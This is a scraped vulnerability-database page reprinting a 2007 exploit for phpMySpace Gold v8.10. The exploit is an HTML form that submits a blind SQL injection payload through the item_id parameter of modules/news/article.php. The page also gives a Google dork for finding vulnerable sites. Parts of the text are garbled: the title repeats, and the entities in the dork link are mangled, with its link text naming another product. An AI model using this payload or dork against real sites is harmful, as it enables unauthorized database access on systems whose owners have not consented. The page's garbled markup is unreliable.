phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
discovered...">phpMySpace Gold (v8.10) - Blind SQL/XPath Injection ... - vulnerability database | Vulners.comphpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
discovered...">phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
discovered...">phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
discovered...">
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16833
HistoryApr 24, 2007 - 12:00 a.m.

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

2007-04-2400:00:00
vulners.com
16
JSON

<!–

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

Vulnerable Variable: item_id
Vulnerable File: modules/news/article.php
Vulnerable: phpMySpace Gold v8.10 (other versions should also be vulnerable)
Google d0rk: "Powered by phpMySpace Gold 8.10"

John Martinelli
[email protected]
http://john-martinelli.com

April 22nd, 2007

!–>

<html>
<head><title>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</title><body>

<center><br><br><font size=4>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=+&#37;22Powered+by+phpMySpace+Gold+8.10&#37;22&quot;&gt;&amp;quot;Powered by Ripe Website Manager&quot;</a></font><br>

<br><br>
<form action="http://www.example.com/path/modules/news/article.php&quot; method="get">
<input name="mode" type="hidden" value="0">
<input name="order" type="hidden" value="0">
<input name="item_id" size=75 value="1&quot; AND &quot;1&quot;=&quot;0">
<input type=submit value="Execute SQL Injection" class="button">
</form>

</body></html>

JSON